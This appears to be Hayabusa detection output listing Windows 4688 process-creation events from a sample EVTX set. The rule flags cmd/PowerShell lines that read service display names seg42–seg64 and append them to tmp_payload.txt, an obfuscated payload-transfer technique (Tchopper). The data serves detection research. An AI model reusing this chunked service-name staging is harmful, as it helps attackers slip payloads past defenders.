+2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:29.330 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:29.346 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb70 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:35.192 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:35.208 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:36.629 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:36.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:45.315 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:45.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:48.220 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:48.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:51.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:51.118 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:52.551 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:52.566 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:55.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:55.453 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:56.883 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:56.898 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
